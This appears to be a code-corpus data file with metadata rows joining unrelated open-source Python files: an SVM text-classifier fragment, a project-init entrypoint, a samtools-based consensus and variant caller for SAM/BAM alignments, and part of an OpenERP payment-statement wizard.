# train_x_tfidf = tfidf_vect.transform(train_x)
# test_x_tfidf = tfidf_vect.transform(test_x)
x_tfidf = tfidf_vect.transform(df["Text"])
y = encoder.fit_transform(y)
# print(tfidf_vect.vocabulary_)
# Fit the training dataset to the classifier
print("TRAINING THE MODEL")
SVM = svm.SVC(C=1.0, kernel='linear', degree=3, gamma='auto')
skf = StratifiedKFold(n_splits=10, shuffle=True, random_state=1)
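# Stratified folds preserve the class (publication title) proportions in every train/test split.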
accuracies = []
fold = 1
for train_idx, test_idx in skf.split(x, y):
print("Working on fold", fold)
x_train_fold, x_test_fold = x_tfidf[train_idx], x_tfidf[test_idx]
y_train_fold, y_test_fold = y[train_idx], y[test_idx]
SVM.fit(x_train_fold, y_train_fold)
acc = SVM.score(x_test_fold, y_test_fold)
print("Acc", fold, ":", acc)
accuracies.append(acc)
fold += 1
print("ACCURACIES:", accuracies)
print("Max Accuracy:", np.max(accuracies))
print("Min Accuracy:", np.min(accuracies))
print("Mean of Accuracies:", np.mean(accuracies))
print("STD of Accuracies:", np.std(accuracies))
# print("RUNNING TEST PREDICTIONS")
# predictions = SVM.predict(test_x_tfidf)
# # Calculate accuracy score
# accuracy = accuracy_score(test_y, predictions)
# print("Accuracy:", str(accuracy * 100) + "%")
| 31.650602 | 132 | 0.760183 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,351 | 0.514275 |
6a046c97530ca1a780b9dd23d59ddcc8df166fa3 | 263 | py | Python | red_dwarf/entrypoints/project_management.py | JesseMaitland/red-dwarf | f606ada43f4be72c5cab61049182b58c0c348602 | ["MIT"] | null | null | null | red_dwarf/entrypoints/project_management.py | JesseMaitland/red-dwarf | f606ada43f4be72c5cab61049182b58c0c348602 | ["MIT"] | null | null | null | red_dwarf/entrypoints/project_management.py | JesseMaitland/red-dwarf | f606ada43f4be72c5cab61049182b58c0c348602 | ["MIT"] | null | null | null
from rsterm import EntryPoint
from red_dwarf.project import provide_project_context, ProjectContext
class InitProject(EntryPoint):
@provide_project_context
def run(self, project_context: ProjectContext) -> None:
project_context.init_project()
| 23.909091 | 69 | 0.790875 | 159 | 0.604563 | 0 | 0 | 123 | 0.467681 | 0 | 0 | 0 | 0 |
6a048666edf3e5d75a0ded13639990b1d6bed2e8 | 33,554 | py | Python | src/consensus.py | dschwoerer/samscripts | caee697e96a0639b7a4f9db02f70f4fd92b39ef9 | ["MIT"] | null | null | null | src/consensus.py | dschwoerer/samscripts | caee697e96a0639b7a4f9db02f70f4fd92b39ef9 | ["MIT"] | null | null | null | src/consensus.py | dschwoerer/samscripts | caee697e96a0639b7a4f9db02f70f4fd92b39ef9 | ["MIT"] | null | null | null
#! /usr/bin/env python
# Copyright Ivan Sovic, 2015. www.sovic.org
#
# Creates a pileup from a given SAM/BAM file, and calls consensus bases (or variants).
import os
import sys
import operator
import subprocess
def increase_in_dict(dict_counter, value):
try:
dict_counter[value] += 1
except:
dict_counter[value] = 1
def process_mpileup_line(
line,
line_number,
ret_variant_list,
ret_vcf_list,
ret_snp_count,
ret_insertion_count,
ret_deletion_count,
ret_num_undercovered_bases,
ret_num_called_bases,
ret_num_correct_bases,
ret_coverage_sum,
coverage_threshold,
verbose=False,
):
# Split the line, and perform a sanity check.
split_line = line.strip().split("\t")
if len(split_line) < 5 or len(split_line) > 6:
sys.stderr.write(line + "\n")
return 0
ref_name = split_line[0]
position = split_line[1]
ref_base = split_line[2]
coverage = split_line[3]
original_bases = split_line[4]
if len(split_line) == 6:
qualities = split_line[5]
bases = ""
# Replace the '.' and ',' signs with the actual reference base.
i = 0
while i < len(original_bases):
if original_bases[i] == "." or original_bases[i] == ",":
bases += ref_base
else:
bases += original_bases[i]
i += 1
base_counts = {}
insertion_count = 0
current_base_deletion_count = 0
deletion_count = 0
insertion_event_counts = {}
deletion_event_counts = {}
end_counts = 0
# print 'position: %s' % position;
# print 'bases: "%s"' % bases;
# print 'line_number: %d' % line_number;
# print line;
# print '';
# sys.stdout.flush();
i = 0
while i < len(bases):
base = bases[i]
if base == r"^":
# This is the starting position of a read. It encodes two
# symbols: '^' marking the read start and a char marking the
# mapping quality of the read.
# increase_in_dict(base_counts, bases[i + 1].upper());
i += 1
# Increase only by 1, because we have i += 1 down there.
elif base == r"$":
# This marks the end of a read.
end_counts += 1
elif base == r"*":
# This is a deletion, just count it.
current_base_deletion_count += 1
elif base == r"-":
            # This marks the occurrence of deletions. It is a composite object
# consisting of: the special character '-', the number of the deleted bases
# and the actual bases that are deleted (these bases follow the current position).
# In our approach, we ignore this case, because we count deletions one by one
# through the '*' character.
# Get the number of bases that need to be skipped in the string.
j = i + 1
while bases[j] in "0123456789":
j += 1
num_bases = int(bases[(i + 1) : j])
skip_bases = (j - i) + num_bases - 1
deletion_count += 1
deletion = bases[j : (j + num_bases)].upper()
increase_in_dict(deletion_event_counts, deletion)
# Skip the length of the numeric entry plus the actual number of bases
# that need to be skipped.
i += skip_bases
elif base == r"+":
            # This marks the occurrence of an insertion. It is a composite object
# consisting of: the special character '+', the number of the inserted bases
# and the actual bases that are inserted (these bases follow the current position).
# Similar to the deletion marking, but here we actually care about the bases,
# and we need to make an allele aware count.
# Get the number of bases that are inserted;
j = i + 1
while bases[j] in "0123456789":
j += 1
num_bases = int(bases[(i + 1) : j])
skip_bases = (j - i) + num_bases - 1
insertion_count += 1
insertion = bases[j : (j + num_bases)].upper()
increase_in_dict(insertion_event_counts, insertion)
i += skip_bases
else:
increase_in_dict(base_counts, bases[i].upper())
i += 1
    # TODO: An additional problematic case, discovered on 03.11.2014 when analyzing BWA-MEM's mpileup.
# There are pileup bases that do not have any actual bases, but only the '*' symbols. How should this be handled properly?
# Example line from the mpileup file:
# gi|48994873|gb|U00096.2|_Escherichia_coli_str._K-12_substr._MG1655,_complete_genome 1938202 T 20 ******************** 8,2*#-;)$B>2$1&D-
# I chose to handle them as undercovered bases.
non_indel_coverage_current_base = int(coverage) - current_base_deletion_count
if verbose == True:
sys.stdout.write("%s\nbase_counts: %s\n" % (line.strip(), str(base_counts)))
# EDIT: Previously I compared the total coverage of the current base with the coverage threshold.
# However, the total coverage also accounts for the deletions denoted with the '*' sign, which I think
# isn't relevant, as deletions are counted prior to occuring, and at that point is already decided if there is going
# to be a deletion event. If we wound up at this base (i.e. this base didn't get skipped because of a deletion
# consensus), then the deletions on this base are ignored.
# if (int(coverage) < coverage_threshold or int(coverage) == current_base_deletion_count):
# if (non_indel_coverage_current_base < coverage_threshold):
if int(coverage) < coverage_threshold:
ret_num_undercovered_bases[0] += 1
# ret_coverage_sum[0] += 0;
ret_coverage_sum[0] += int(coverage)
# TODO: Should I count total coverage of this base, or the non_indel_coverage_current_base?
sorted_base_counts = [["A", 0], ["C", 0], ["T", 0], ["G", 0]]
sorted_base_counts = sorted(
list(base_counts.items()), key=operator.itemgetter(1)
)
try:
most_common_base_count = sorted_base_counts[-1][1]
except Exception as e:
most_common_base_count = 0
pass
# variant_line = 'undercovered1\tpos = %s\tcoverage = %d\tnon_indel_cov_curr = %d\tmost_common_base_count = %d\tref_base = %s\tcons_base = %s\tbase_counts = %s\tinsertion_counts = %s\tdeletion_counts = %s\t%s' % (position, int(coverage), non_indel_coverage_current_base, most_common_base_count, ref_base, sorted_base_counts[-1][0], str(sorted_base_counts), str(insertion_event_counts), str(deletion_event_counts), line.strip());
# ret_variant_list.append(variant_line);
variant_line = (
"undercovered1\tpos = %s\tref = %s\tcoverage = %d\tbase_counts = %s\tinsertion_counts = %s\tdeletion_counts = %s"
% (
position,
ref_name,
int(coverage),
str(sorted_base_counts),
str(insertion_event_counts),
str(deletion_event_counts),
)
)
ret_variant_list.append(variant_line)
### VCF output ###
qual = 1000
info = "DP=%s;TYPE=snp" % (coverage)
ref_field = ref_base
alt_field = "N"
vcf_line = "%s\t%s\t.\t%s\t%s\t%d\tPASS\t%s" % (
ref_name,
position,
ref_field,
alt_field,
qual,
info,
)
ret_vcf_list.append(vcf_line)
##################
else:
ret_num_called_bases[0] += 1
ret_coverage_sum[0] += int(coverage)
# TODO: Should I count total coverage of this base, or the non_indel_coverage_current_base?
most_common_base_count = 0
### Handling base consensus.
sorted_base_counts = sorted(
list(base_counts.items()), key=operator.itemgetter(1)
)
try:
most_common_base_count = sorted_base_counts[-1][1]
except Exception as e:
pass
# sys.stderr.write(str(e) + '\n');
# sys.stderr.write('sorted_base_counts:\n');
# sys.stderr.write(str(sorted_base_counts) + '\n');
# sys.stderr.write('base_counts:\n');
# sys.stderr.write(str(base_counts) + '\n');
# sys.stderr.write('original_bases:\n');
# sys.stderr.write(str(original_bases) + '\n');
# sys.stderr.write('line:\n');
# sys.stderr.write(line.strip() + '\n');
# most_common_base_count = 0;
# Allow for the case where there are multiple equally good choices.
# In this case, we prefer the choice which is equal to the reference.
is_good = False
for base_count in sorted_base_counts:
if base_count[1] == most_common_base_count:
if base_count[0] == ref_base:
is_good = True
break
if is_good == False:
if len(sorted_base_counts) > 0:
ret_snp_count[0] += 1
# ret_variant_list.append(line_number);
variant_line = (
"SNP\tpos = %s\tref = %s\tcoverage = %d\tnon_indel_cov_curr = %d\tmost_common_base_count = %d\tref_base = %s\tcons_base = %s\tbase_counts = %s\tinsertion_counts = %s\tdeletion_counts = %s\t%s"
% (
position,
ref_name,
int(coverage),
non_indel_coverage_current_base,
most_common_base_count,
ref_base,
("{}")
if (len(sorted_base_counts) == 0)
else (str(sorted_base_counts[-1][0])),
str(sorted_base_counts),
str(insertion_event_counts),
str(deletion_event_counts),
line.strip(),
)
)
ret_variant_list.append(variant_line)
### VCF output ###
alt_base = (
("{}")
if (len(sorted_base_counts) == 0)
else (str(sorted_base_counts[-1][0]))
)
qual = 1000
info = "DP=%s;TYPE=snp" % (coverage)
ref_field = ref_base
alt_field = alt_base
vcf_line = "%s\t%s\t.\t%s\t%s\t%d\tPASS\t%s" % (
ref_name,
position,
ref_field,
alt_field,
qual,
info,
)
ret_vcf_list.append(vcf_line)
##################
else:
sys.stderr.write(
"\nWarning: a SNP was detected, but there were no bases in the sorted_base_counts!"
)
variant_line = (
"SNP\tpos = %s\tref = %s\tcoverage = %d\tnon_indel_cov_curr = %d\tmost_common_base_count = %d\tref_base = %s\tcons_base = %s\tbase_counts = %s\tinsertion_counts = %s\tdeletion_counts = %s\t%s"
% (
position,
ref_name,
int(coverage),
non_indel_coverage_current_base,
most_common_base_count,
ref_base,
("{}")
if (len(sorted_base_counts) == 0)
else (str(sorted_base_counts[-1][0])),
str(sorted_base_counts),
str(insertion_event_counts),
str(deletion_event_counts),
line.strip(),
)
)
sys.stderr.write("\n")
else:
ret_num_correct_bases[0] += 1
if verbose == True:
sys.stdout.write("Reference base: %s\n" % (ref_base))
sys.stdout.write("Consensus base: %s\n\n" % (base_count[0]))
# if (int(position) == 100000 or int(position) == 1000000 or int(position) == 2000000 or int(position) == 3000000 or int(position) == 4000000):
# print '\nTEST\tpos = %s\tcoverage = %d\tnon_indel_cov_curr = %d\tmost_common_base_count = %d\tref_base = %s\tcons_base = %s\tbase_counts = %s\tinsertion_counts = %s\tdeletion_counts = %s\t%s\n' % (position, int(coverage), non_indel_coverage_current_base, most_common_base_count, ref_base, sorted_base_counts[-1][0], str(sorted_base_counts), str(insertion_event_counts), str(deletion_event_counts), line.strip());
### Handling indel consensus.
### Put a different coverage threshold. Here we are interested even in the reads
### which had a '*' at the current position (because we don't know where it ends).
non_indel_coverage_next_base = (
int(coverage) - end_counts - deletion_count - insertion_count
)
if (
non_indel_coverage_next_base + deletion_count + insertion_count
) > coverage_threshold:
# Sanity check, just to see if there actually were any insertions (to avoid index out of bounds error).
# If there are insertions, get the most common one.
if len(list(insertion_event_counts.keys())) > 0:
sorted_insertion_counts = sorted(
list(insertion_event_counts.items()), key=operator.itemgetter(1)
)
most_common_insertion_count = sorted_insertion_counts[-1][1]
most_common_insertion_length = len(sorted_insertion_counts[-1][0])
insertion_unique = (
True
if (
sum(
[
int(insertion_count[1] == most_common_insertion_count)
for insertion_count in sorted_insertion_counts
]
)
== 1
)
else False
)
else:
most_common_insertion_count = 0
most_common_insertion_length = 0
insertion_unique = False
# Sanity check, just to see if there actually were any deletions (to avoid index out of bounds error).
# If there are deletions, get the most common one.
if len(list(deletion_event_counts.keys())) > 0:
sorted_deletion_counts = sorted(
list(deletion_event_counts.items()), key=operator.itemgetter(1)
)
most_common_deletion_count = sorted_deletion_counts[-1][1]
most_common_deletion_length = len(sorted_deletion_counts[-1][0])
deletion_unique = (
True
if (
sum(
[
int(deletion_count[1] == most_common_deletion_count)
for deletion_count in sorted_deletion_counts
]
)
== 1
)
else False
)
else:
most_common_deletion_count = 0
most_common_deletion_length = 0
deletion_unique = False
if (
most_common_insertion_count > most_common_deletion_count
and most_common_insertion_count > non_indel_coverage_next_base
):
# In this case, insertions are a clear winner.
if insertion_unique == True:
# ret_insertion_count[0] += most_common_insertion_length;
ret_insertion_count[0] += 1
ret_num_called_bases[0] += most_common_insertion_length
# variant_line = 'insertion\t%d\t%s\t%s\t%s\t%s' % (most_common_insertion_count, str(sorted_base_counts), str(insertion_event_counts), str(deletion_event_counts), line.strip());
# ret_variant_list.append(variant_line);
try:
temp_sorted_bc = sorted_base_counts[-1][0]
except:
temp_sorted_bc = 0
indel_length = most_common_insertion_length
variant_line = (
"ins\tpos = %s\tref = %s\tnon_indel_cov_next = %d\tnon_indel_cov_curr = %d\tmost_common_insertion_count = %d\tref_base = %s\tcons_base = %s\tbase_counts = %s\tinsertion_counts = %s\tdeletion_counts = %s\t%s"
% (
position,
ref_name,
non_indel_coverage_next_base,
non_indel_coverage_current_base,
most_common_insertion_count,
ref_base,
temp_sorted_bc,
str(sorted_base_counts),
str(insertion_event_counts),
str(deletion_event_counts),
line.strip(),
)
)
ret_variant_list.append(variant_line)
### Insertions in the VCF format specifies the position where a insertion occurs. The ref position should contain the base which is the same as ref, but the alt field contains the ref base + the insertion event.
### VCF output ###
alt_base = (
("{}")
if (len(sorted_base_counts) == 0)
else (str(sorted_base_counts[-1][0]))
)
qual = 1000
info = "DP=%s;TYPE=ins" % (coverage)
ref_field = ref_base
alt_field = "%s%s" % (ref_base, sorted_insertion_counts[-1][0])
vcf_line = "%s\t%s\t.\t%s\t%s\t%d\tPASS\t%s" % (
ref_name,
position,
ref_field,
alt_field,
qual,
info,
)
ret_vcf_list.append(vcf_line)
##################
elif (
most_common_deletion_count > most_common_insertion_count
and most_common_deletion_count > non_indel_coverage_next_base
):
# In this case, deletions are a clear winner.
if deletion_unique == True:
# ret_deletion_count[0] += most_common_deletion_length;
ret_deletion_count[0] += 1
# variant_line = 'deletion\t%d\t%s\t%s\t%s\t%s' % (most_common_deletion_count, str(sorted_base_counts), str(insertion_event_counts), str(deletion_event_counts), line.strip());
# ret_variant_list.append(variant_line);
# return most_common_deletion_length;
variant_line = (
"del\tpos = %s\tref = %s\tnon_indel_cov_next = %d\tnon_indel_cov_curr = %d\tmost_common_deletion_count = %d\tref_base = %s\tcons_base = %s\tbase_counts = %s\tinsertion_counts = %s\tdeletion_counts = %s\t%s"
% (
position,
ref_name,
non_indel_coverage_next_base,
non_indel_coverage_current_base,
most_common_deletion_count,
ref_base,
sorted_base_counts[-1][0],
str(sorted_base_counts),
str(insertion_event_counts),
str(deletion_event_counts),
line.strip(),
)
)
ret_variant_list.append(variant_line)
### Deletions in the VCF format specifies the position where a deletion occurs, with the first base being non-deletion, and the following bases being a deletion event.
### VCF output ###
alt_base = (
("{}")
if (len(sorted_base_counts) == 0)
else (str(sorted_base_counts[-1][0]))
)
qual = 1000
info = "DP=%s;TYPE=del" % (coverage)
ref_field = "%s%s" % (ref_base, sorted_deletion_counts[-1][0])
alt_field = ref_base
vcf_line = "%s\t%s\t.\t%s\t%s\t%d\tPASS\t%s" % (
ref_name,
position,
ref_field,
alt_field,
qual,
info,
)
ret_vcf_list.append(vcf_line)
##################
return most_common_deletion_length
else:
# In this case, either the base count consensus wins, or the
# insertion/deletion count is ambiguous.
pass
return 0
def process_mpileup(
alignments_path,
reference_path,
mpileup_path,
coverage_threshold,
output_prefix,
thread_id=0,
bed_position="",
):
fp = None
try:
fp = open(mpileup_path, "r")
except IOError:
sys.stderr.write(
'ERROR: Could not open file "%s" for reading!\n' % mpileup_path
)
return None
ret_variant_list = []
ret_vcf_list = []
ret_snp_count = [0]
ret_insertion_count = [0]
ret_deletion_count = [0]
ret_num_undercovered_bases = [0]
ret_num_called_bases = [0]
ret_num_correct_bases = [0]
ret_coverage_sum = [0]
# lines = fp.readlines();
fp_variant = None
fp_vcf = None
if output_prefix != "":
if not os.path.exists(os.path.dirname(output_prefix)):
os.makedirs(os.path.dirname(output_prefix))
variant_file = "%s-cov_%d.variant.csv" % (output_prefix, coverage_threshold)
fp_variant = open(variant_file, "w")
vcf_file = "%s-cov_%d.variant.vcf" % (output_prefix, coverage_threshold)
fp_vcf = open(vcf_file, "w")
fp_vcf.write("##fileformat=VCFv4.0\n")
fp_vcf.write("##fileDate=20150409\n")
fp_vcf.write("##source=%s\n" % (" ".join(sys.argv)))
fp_vcf.write("##reference=%s\n" % reference_path)
fp_vcf.write('##INFO=<ID=DP,Number=1,Type=Integer,Description="Raw Depth">\n')
fp_vcf.write(
'##INFO=<ID=TYPE,Number=A,Type=String,Description="Type of each allele (snp, ins, del, mnp, complex)">\n'
)
fp_vcf.write(
'##INFO=<ID=AF,Number=1,Type=Float,Description="Allele Frequency">\n'
)
fp_vcf.write(
'##INFO=<ID=SB,Number=1,Type=Integer,Description="Phred-scaled strand bias at this position">\n'
)
fp_vcf.write(
'##INFO=<ID=DP4,Number=4,Type=Integer,Description="Counts for ref-forward bases, ref-reverse, alt-forward and alt-reverse bases">\n'
)
fp_vcf.write(
'##INFO=<ID=INDEL,Number=0,Type=Flag,Description="Indicates that the variant is an INDEL.">\n'
)
fp_vcf.write(
'##INFO=<ID=CONSVAR,Number=0,Type=Flag,Description="Indicates that the variant is a consensus variant (as opposed to a low frequency variant).">\n'
)
fp_vcf.write(
'##INFO=<ID=HRUN,Number=1,Type=Integer,Description="Homopolymer length to the right of report indel position">\n'
)
fp_vcf.write("#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\n")
fp_vcf.flush()
use_bed = False
bed_chromosome = ""
bed_pos_start = 0
# bed_pos_end = len(lines);
bed_pos_end = -1
if bed_position != "":
bed_split = bed_position.split(":")
if len(bed_split) != 2:
use_bed = False
else:
bed_chromosome = bed_split[0]
bed_pos_split = bed_split[1].split("-")
if len(bed_pos_split) != 2:
use_bed = False
else:
bed_pos_start = int(bed_pos_split[0])
bed_pos_end = int(bed_pos_split[1])
use_bed = True
sys.stderr.write("Using location specified through commandline:\n")
sys.stderr.write('\tChromosome: "%s"\n' % bed_chromosome)
sys.stderr.write("\tStart: %d\n" % bed_pos_start)
sys.stderr.write("\tEnd: %d\n\n" % bed_pos_end)
# i = 0;
i = 0 if (use_bed == False) else max((bed_pos_start - 10), 0)
j = 0
# while (i < bed_pos_end): # len(lines)):
num_bases_to_skip = 0
for line in fp:
# line = lines[i];
if num_bases_to_skip > 0:
num_bases_to_skip -= 1
continue
if use_bed == True:
line_split = line.strip().split("\t")
if len(line_split) > 2 and line_split[0] == bed_chromosome:
current_pos = int(line_split[1])
if current_pos < bed_pos_start or current_pos >= bed_pos_end:
i += 1
j += 1
continue
else:
# print line_split[0];
# print bed_chromosome;
i += 1
j += 1
continue
if thread_id == 0:
if (j % 1000) == 0:
sys.stderr.write(
"\r[%d] snps = %d, insertions = %d, deletions = %d, undercovered = %d, coverage = %.2f"
% (
i,
ret_snp_count[0],
ret_insertion_count[0],
ret_deletion_count[0],
ret_num_undercovered_bases[0],
(float(ret_coverage_sum[0]) / float((i + 1))),
)
)
sys.stderr.flush()
variant_list_length = len(ret_variant_list)
vcf_list_length = len(ret_vcf_list)
num_bases_to_skip = process_mpileup_line(
line,
i,
ret_variant_list,
ret_vcf_list,
ret_snp_count,
ret_insertion_count,
ret_deletion_count,
ret_num_undercovered_bases,
ret_num_called_bases,
ret_num_correct_bases,
ret_coverage_sum,
coverage_threshold,
verbose=use_bed,
)
if len(ret_variant_list) > variant_list_length and fp_variant != None:
fp_variant.write("\n".join(ret_variant_list[variant_list_length:]) + "\n")
fp_variant.flush()
if len(ret_vcf_list) > vcf_list_length and fp_vcf != None:
fp_vcf.write("\n".join(ret_vcf_list[vcf_list_length:]) + "\n")
fp_vcf.flush()
i += num_bases_to_skip
i += 1
j += 1
# if (i > 10000):
# break;
fp.close()
sys.stderr.write("\n")
if fp_variant != None:
fp_variant.close()
if fp_vcf != None:
fp_vcf.close()
summary_lines = ""
summary_lines += "alignments_file: %s\n" % alignments_path
summary_lines += "mpileup_file: %s\n" % mpileup_path
summary_lines += "coverage_threshold: %d\n" % coverage_threshold
summary_lines += "snp_count: %d\n" % ret_snp_count[0]
summary_lines += "insertion_count: %d\n" % ret_insertion_count[0]
summary_lines += "deletion_count: %d\n" % ret_deletion_count[0]
summary_lines += "num_undercovered_bases: %d\n" % ret_num_undercovered_bases[0]
summary_lines += "num_called_bases: %d\n" % ret_num_called_bases[0]
summary_lines += "num_correct_bases: %d\n" % ret_num_correct_bases[0]
summary_lines += "average_coverage: %.2f\n" % (
(float(ret_coverage_sum[0]) / float((i + 1)))
)
sys.stderr.write(summary_lines + "\n")
sys.stderr.write("\n")
if output_prefix != "":
# summary_file = output_prefix + '.conssum';
summary_file = "%s-cov_%d.variant.sum" % (output_prefix, coverage_threshold)
try:
fp_sum = open(summary_file, "w")
fp_sum.write(summary_lines)
fp_sum.close()
return summary_file
except IOError:
sys.stderr.write(
'ERROR: Could not open file "%s" for writing!\n' % (summary_file)
)
return None
return None
def main(
alignments_path,
reference_path,
coverage_threshold,
output_prefix,
thread_id=0,
bed_position="",
):
# Sanity checking the existence of the file, and the correctness of its extension.
# Also, if input file is a SAM file, then convert it to a sorted BAM.
alignments_path_bam = alignments_path
if os.path.exists(alignments_path) == False:
sys.stderr.write('ERROR: File "%s" does not exist!\n' % alignments_path)
return
if alignments_path.endswith("sam"):
# Determine the path where the new BAM file will be generated.
dir_name = os.path.dirname(alignments_path)
if dir_name == "":
dir_name = "."
alignments_path_bam = (
dir_name
+ "/"
+ os.path.splitext(os.path.basename(alignments_path))[0]
+ ".bam"
)
alignments_path_bam_exists = os.path.exists(alignments_path_bam)
# Check if a BAM file with the given name already exists.
if alignments_path_bam_exists == False or (
alignments_path_bam_exists == True
and os.path.getmtime(alignments_path)
> os.path.getmtime(alignments_path_bam)
):
# Convert the SAM file to a sorted BAM file.
command = "samtools view -bS %s | samtools sort - %s" % (
alignments_path,
os.path.splitext(alignments_path_bam)[0],
)
sys.stderr.write(command + "\n")
            subprocess.call(command, shell=True)
# Create the BAM index file.
command = "samtools index %s %s.bai" % (
alignments_path_bam,
alignments_path_bam,
)
            subprocess.call(command, shell=True)
elif alignments_path.endswith("bam") == False:
sys.stderr.write(
'ERROR: File extension needs to be either .sam or .bam! Input file path: "%s".\n'
% alignments_path
)
return
# Convert the sorted BAM file to a mpileup file if it doesn't exist yet.
mpileup_path = "%s.mpileup" % alignments_path_bam
mpileup_exists = os.path.exists(mpileup_path)
if mpileup_exists == False or (
mpileup_exists == True
and os.path.getmtime(alignments_path) > os.path.getmtime(mpileup_path)
):
command = "samtools mpileup -B -d 1000000 -Q 0 -A -f %s %s > %s.mpileup" % (
reference_path,
alignments_path_bam,
alignments_path_bam,
)
        subprocess.call(command, shell=True)
sys.stderr.write('Processing file "%s"...\n' % alignments_path)
sys.stderr.write('Reference file "%s"...\n' % reference_path)
sys.stderr.write("Coverage threshold: %d\n" % coverage_threshold)
summary_file = process_mpileup(
alignments_path,
reference_path,
("%s.mpileup" % alignments_path_bam),
coverage_threshold,
output_prefix,
thread_id,
bed_position,
)
def CollectSummaries(
sam_files, prefix_for_intermediate_results, collective_output_file
):
fp_collect = None
try:
fp_collect = open(collective_output_file, "w")
except IOError:
sys.stderr.write(
'ERROR: Could not open file "%s" for writing!\n' % collective_output_file
)
return
for sam_file in sam_files:
summary_file = prefix_for_intermediate_results + ".sum"
try:
fp_sum = open(summary_file, "r")
lines = fp_sum.readlines()
fp_sum.close()
except IOError:
sys.stderr.write(
'ERROR: Could not open file "%s" for reading!\n' % summary_file
)
continue
fp_collect.write("".join(lines) + "\n")
fp_collect.close()
if __name__ == "__main__":
# if (len(sys.argv) < 5):
# sys.stderr.write('Usage:\n');
# sys.stderr.write('\t%s <reference_file_path> coverage_threshold <collective_output_file> <{sb}am_file_1> [<{sb}am_file_2> <{sb}am_file_3> ...]\n' % sys.argv[0]);
# sys.stderr.write('\t(If <collective_output_file> is equal to "-", no files will be written to disk.)\n');
# exit(1);
if len(sys.argv) < 5:
sys.stderr.write("Usage:\n")
sys.stderr.write(
"\t%s <reference_file_path> coverage_threshold <output_prefix> <{sb}am_file_> [position]\n"
% sys.argv[0]
)
sys.stderr.write(
'\t(If <collective_output_file> is equal to "-", no files will be written to disk.)\n'
)
sys.stderr.write(
'\tPosition parameter is a string specifying "chromosome:start-end"\n\n'
)
exit(1)
reference_file = sys.argv[1]
coverage_threshold = int(sys.argv[2])
output_prefix = sys.argv[3]
sam_file = sys.argv[4]
bed_position = ""
if len(sys.argv) > 5:
bed_position = sys.argv[5]
# sys.stderr.write('bed_position: "%s"\n\n' % bed_position);
processes = []
if output_prefix == "-":
output_prefix = os.path.splitext(sam_file)[0]
main(sam_file, reference_file, coverage_threshold, output_prefix, 0, bed_position)
# if (output_prefix != '-'):
# CollectSummaries([sam_file], output_prefix, output_prefix + '.variant.sum');
| 39.755924 | 436 | 0.550933 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11,251 | 0.33531 |
6a049ff78a91de998072b637d1639d25a433a194 | 5,867 | py | Python | web/addons/account_payment/wizard/account_payment_populate_statement.py | diogocs1/comps | 63df07f6cf21c41e4527c06e2d0499f23f4322e7 | ["Apache-2.0"] | null | null | null | web/addons/account_payment/wizard/account_payment_populate_statement.py | diogocs1/comps | 63df07f6cf21c41e4527c06e2d0499f23f4322e7 | ["Apache-2.0"] | null | null | null | web/addons/account_payment/wizard/account_payment_populate_statement.py | diogocs1/comps | 63df07f6cf21c41e4527c06e2d0499f23f4322e7 | ["Apache-2.0"] | null | null | null
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from lxml import etree
from openerp.osv import fields, osv
class account_payment_populate_statement(osv.osv_memory):
_name = "account.payment.populate.statement"
_description = "Account Payment Populate Statement"
_columns = {
'lines': fields.many2many('payment.line', 'payment_line_rel_', 'payment_id', 'line_id', 'Payment Lines')
}
def fields_view_get(self, cr, uid, view_id=None, view_type='form', context=None, toolbar=False, submenu=False):
line_obj = self.pool.get('payment.line')
res = super(account_payment_populate_statement, self).fields_view_get(cr, uid, view_id=view_id, view_type=view_type, context=context, toolbar=toolbar, submenu=False)
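        # Limit the selectable payment lines to those that are unreconciled, valid, and
        # not yet linked to a bank statement line (or whose payment order has no mode).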
line_ids = line_obj.search(cr, uid, [
('move_line_id.reconcile_id', '=', False),
('bank_statement_line_id', '=', False),
('move_line_id.state','=','valid')])
line_ids.extend(line_obj.search(cr, uid, [
('move_line_id.reconcile_id', '=', False),
('order_id.mode', '=', False),
('move_line_id.state','=','valid')]))
domain = '[("id", "in", '+ str(line_ids)+')]'
doc = etree.XML(res['arch'])
nodes = doc.xpath("//field[@name='lines']")
for node in nodes:
node.set('domain', domain)
res['arch'] = etree.tostring(doc)
return res
def populate_statement(self, cr, uid, ids, context=None):
line_obj = self.pool.get('payment.line')
statement_obj = self.pool.get('account.bank.statement')
statement_line_obj = self.pool.get('account.bank.statement.line')
currency_obj = self.pool.get('res.currency')
voucher_obj = self.pool.get('account.voucher')
voucher_line_obj = self.pool.get('account.voucher.line')
move_line_obj = self.pool.get('account.move.line')
if context is None:
context = {}
data = self.read(cr, uid, ids, context=context)[0]
line_ids = data['lines']
if not line_ids:
return {'type': 'ir.actions.act_window_close'}
statement = statement_obj.browse(cr, uid, context['active_id'], context=context)
for line in line_obj.browse(cr, uid, line_ids, context=context):
ctx = context.copy()
            ctx['date'] = line.ml_maturity_date  # was value_date earlier, but this field no longer exists
amount = currency_obj.compute(cr, uid, line.currency.id,
statement.currency.id, line.amount_currency, context=ctx)
if not line.move_line_id.id:
continue
context = dict(context, move_line_ids=[line.move_line_id.id])
result = voucher_obj.onchange_partner_id(cr, uid, [], partner_id=line.partner_id.id, journal_id=statement.journal_id.id, amount=abs(amount), currency_id= statement.currency.id, ttype='payment', date=line.ml_maturity_date, context=context)
if line.move_line_id:
voucher_res = {
'type': 'payment',
'name': line.name,
'partner_id': line.partner_id.id,
'journal_id': statement.journal_id.id,
'account_id': result['value'].get('account_id', statement.journal_id.default_credit_account_id.id),
'company_id': statement.company_id.id,
'currency_id': statement.currency.id,
'date': line.date or time.strftime('%Y-%m-%d'),
'amount': abs(amount),
'period_id': statement.period_id.id,
}
voucher_id = voucher_obj.create(cr, uid, voucher_res, context=context)
voucher_line_dict = {}
for line_dict in result['value']['line_cr_ids'] + result['value']['line_dr_ids']:
move_line = move_line_obj.browse(cr, uid, line_dict['move_line_id'], context)
